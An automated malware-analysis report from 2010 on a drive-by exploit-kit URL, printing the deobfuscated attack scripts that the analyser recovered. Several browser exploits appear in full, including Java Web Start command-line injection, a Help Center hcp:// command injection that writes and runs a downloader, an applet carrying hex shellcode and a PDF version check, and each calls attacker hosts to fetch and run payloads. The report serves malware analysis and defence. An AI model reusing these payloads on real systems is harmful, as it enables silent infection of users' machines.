Analysis report for http://85.234.190.13/tds/in.cgi?default
Sample Overview
| URL | http://85.234.190.13/tds/in.cgi?default |
|---|
| MD5 | 63e7a8a467205c6c2d6c078de506b30c |
|---|
| Analysis Started | 2010-07-29 01:42:15 |
|---|
| Report Generated | 2010-07-29 01:42:34 |
|---|
| Jsand version | 1.02.02 |
|---|
See the report for domain 85.234.190.13.
Detection results
| Detector | Result |
|---|
| Jsand 1.02.02 | malicious |
Exploits
| Name | Description | Reference |
|---|
| JWS command-line injection | Java Web Start Arbitrary command-line injection | CVE-2010-0886 |
Deobfuscation results
Evals
No evals.
Writes
<script>function W5S1DtZgV8j(){
if (window.navigator.appName == 'Microsoft Internet Explorer'){
var Jk6IaoriiHH = 'http://194.8.250.227/bomj/load.php?spl=java_dt' + '_ie' +
' -J-jar -J\\\\91.188.60.234\\public\\photo1.jpg none';
try {
var d758gkdoT4Y = document.createElement('OBJECT');
d758gkdoT4Y.classid = 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA';
d758gkdoT4Y.launch(Jk6IaoriiHH);
}
catch (Lpk74w1ml7q){
puJqX8Kbftx();
}
}
else {
var Jk6IaoriiHH = 'http://194.8.250.227/bomj/load.php?spl=java_dt' + '_ff' +
' -J-jar -J\\\\91.188.60.234\\public\\photo1.jpg none';
var tM9NDq7V8HL = document.createElement('OBJECT');
var FOOoPAZV2nc = document.createElement('OBJECT');
tM9NDq7V8HL.type = 'application/npruntime-scriptable-plugin;deploymenttoolkit';
FOOoPAZV2nc.type = 'application/java-deployment-toolkit';
document.body.appendChild(tM9NDq7V8HL);
document.body.appendChild(FOOoPAZV2nc);
try {
tM9NDq7V8HL.launch(Jk6IaoriiHH);
}
catch (Lpk74w1ml7q){
try {
FOOoPAZV2nc.launch(Jk6IaoriiHH);
}
catch (Lpk74w1ml7q){
puJqX8Kbftx();
}
}
}
}
function puJqX8Kbftx(){
if (window.navigator.appName == 'Microsoft Internet Explorer'){
document.write('
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM n
ame="launchjnlp" value="-J-jar -J\\\\91.188.60.234\\public\\photo1.jpg none"><PARAM name="
docbase" value="http://194.8.250.227/bomj/load.php?spl=java_ws' + '_ie' + '"></object>');
}
else {
document.write('
<embed type="application/x-java-applet" width="0" height="0" launchjnlp="-J-jar -J\\\\91.1
88.60.234\\public\\photo1.jpg none" docbase="http://194.8.250.227/bomj/load.php?spl=java_w
s' + '_ff' + '"></embed>');
}
}
W5S1DtZgV8j();
</script>
<script>var l5LnO0Ago76ADyWmWw = 'http://194.8.250.227/bomj/helpctrall.asx';
if (window.navigator.appName == 'Microsoft Internet Explorer'){
var EgzKg1OsE6SjZBnvzC = document.createElement('OBJECT');
EgzKg1OsE6SjZBnvzC.setAttribute('classid', 'clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6'
);
EgzKg1OsE6SjZBnvzC.openPlayer(l5LnO0Ago76ADyWmWw);
}
else {
var EgzKg1OsE6SjZBnvzC = document.createElement('IFRAME');
EgzKg1OsE6SjZBnvzC.setAttribute('src', l5LnO0Ago76ADyWmWw);
document.body.appendChild(EgzKg1OsE6SjZBnvzC);
}
</script>
<script type="text/javascript">document.write("
<iframe src=\"hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2
528%2522cmd /c cd ../ @@ echo var a-ActiveXObject;var b-new a(WScript.Arguments(0));b.Open
(WScript.Arguments(1),WScript.Arguments(2),WScript.Arguments(3));b.Send(WScript.Arguments(
4));var c-b.responseBody;var d-new a(WScript.Arguments(5));d.Type-WScript.Arguments(6);d.M
ode-WScript.Arguments(7);d.Open();d.Write(c);var e-WScript.Arguments(8);d.SaveToFile(e,2);
var f-new a(WScript.Arguments(9)).Run(e,WScript.Arguments(10)); > exe.js @@ CScript.exe ex
e.js //b //s _Microsoft.XMLHTTP_ _GET_ _http://194.8.250.227/bomj/load.php__spl-helpctr@h-
_ _false_ _null_ _ADODB.Stream_ 1 3 _exe.exe_ _WScript.Shell_ 0 @@ del /f /q exe.js @@ tas
kkill /im /f HelpCtr.exe%2522.replace(/__/g,String.fromCharCode(63)).replace(/@/g,String.f
romCharCode(38)).replace(/_/g,String.fromCharCode(34)).replace(/-/g,String.fromCharCode(61
))%2529%27%29%29%3C/script%3E\" width=\"10\" height=\"10\" hspace=\"0\" vspace=\"0\" frame
border=\"0\" scrolling=\"0\"></iframe>");
</script>
<iframe src=
"hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript
%20defer%3Eeval%28unescape%28%27Run%2528%2522cmd /c cd ../ @@ echo var a-ActiveXObject;var b-new a(W
Script.Arguments(0));b.Open(WScript.Arguments(1),WScript.Arguments(2),WScript.Arguments(3));b.Send(W
Script.Arguments(4));var c-b.responseBody;var d-new a(WScript.Arguments(5));d.Type-WScript.Arguments
(6);d.Mode-WScript.Arguments(7);d.Open();d.Write(c);var e-WScript.Arguments(8);d.SaveToFile(e,2);var
f-new a(WScript.Arguments(9)).Run(e,WScript.Arguments(10)); > exe.js @@ CScript.exe exe.js //b //s
_Microsoft.XMLHTTP_ _GET_ _http://194.8.250.227/bomj/load.php__spl-helpctr@h-_ _false_ _null_ _ADODB
.Stream_ 1 3 _exe.exe_ _WScript.Shell_ 0 @@ del /f /q exe.js @@ taskkill /im /f HelpCtr.exe%2522.rep
lace(/__/g,String.fromCharCode(63)).replace(/@/g,String.fromCharCode(38)).replace(/_/g,String.fromCh
arCode(34)).replace(/-/g,String.fromCharCode(61))%2529%27%29%29%3C/script%3E" width="10" height="10"
hspace="0" vspace="0" frameborder="0" scrolling="0"></iframe>
<script>function java_gsb(){
var javaelem = document.createElement("applet");
var paramelem = document.createElement("param");
paramelem.setAttribute("name", "sc");
paramelem.setAttribute("value", "
909033c0648b4030780c8b400c8b701cad8b5808eb098b40348d407c8b583c6a445ad1e22be28beceb4f5a5283
ea5689550456578b733c8b74337803f3568b762003f333c9495041ad33ff360fbe140338f27408c1cf0d03fa40
ebef583bf875e55e8b462403c3668b0c488b561c03d38b048a03c35f5e50c38d7d085752b833ca8a5be8a2ffff
ff32c08bf7f2ae4fb8652e6578ab669866abb06c8ae09850686f6e2e646875726c6d54b88e4e0eecff55049350
33c05050568b550483c27f83c2315250b8361a2f70ff55045b33ff5756b898fe8a0eff550457b8efcee060ff55
04687474703a2f2f3139342e382e3235302e3232372f626f6d6a2f6c6f61642e7068703f73706c3d6a6176615f
67736226683d");
javaelem.setAttribute("code", "AppleT");
javaelem.setAttribute("archive", "1.jar");
javaelem.setAttribute("width", "100%");
javaelem.setAttribute("height", "100%");
javaelem.appendChild(paramelem);
document.body.appendChild(javaelem);
}
setTimeout("java_gsb();", 100);
function pdf_ie(){
try {
var pdfObject = document.createElement("OBJECT");
pdfObject.setAttribute("id", "jdf1");
pdfObject.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");
document.body.appendChild(pdfObject);
var ver = jdf1.GetVersions();
ver = ver.split(",");
ver = ver[1].split("=");
ver = ver[1];
if (((ver >= "7") && (ver < "7.1.4")) || ((ver >= "8") && (ver < "8.1.7")) || ((ver >=
"9") && (ver < "9.4"))){
var pdfelement = document.createElement("iframe");
pdfelement.setAttribute("src", "http://194.8.250.227/bomj/pdf.php?h=");
pdfelement.setAttribute("width", 200);
pdfelement.setAttribute("height", 200);
document.body.appendChild(pdfelement);
}
}
catch (e){
}
}
setTimeout("pdf_ie();", 4000);
</script>
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name=
"launchjnlp" value="-J-jar -J\\91.188.60.234\public\photo1.jpg none"><PARAM name="docbase" value=
"http://194.8.250.227/bomj/load.php?spl=java_ws_ie"></object>
Network Activity
Requests
| URL | Status | Content Type |
|---|
| http://85.234.190.13/tds/in.cgi?default | 302 | text/html |
| http://194.8.250.227/bomj/ | 200 | text/html |
Redirects
| From | To |
|---|
| http://85.234.190.13/tds/in.cgi?default | http://194.8.250.227/bomj/ |
ActiveX controls
-
| CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA |
|---|
|
Name |
Arg0 |
Count |
| Methods |
launch |
http://194.8.250.227/bomj/load.php?spl=java_dt_ie -J-jar -J\\91.188.60.234\publi
c\photo1.jpg none |
1 |
-
| 6BF52A52-394A-11D3-B153-00C04F79FAA6 |
|---|
|
Name |
Arg0 |
Count |
| Methods |
openPlayer |
http://194.8.250.227/bomj/helpctrall.asx |
1 |
Shellcode and Malware
No shellcode was identified.
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|
| http://194.8.250.227/bomj/helpctrall.asx |
N/A |
N/A |
|
| http://194.8.250.227/bomj/load.php?spl=java_dt_ie -J-jar -J\\91.188.60.234\public\photo1.jpg none |
N/A |
N/A |
|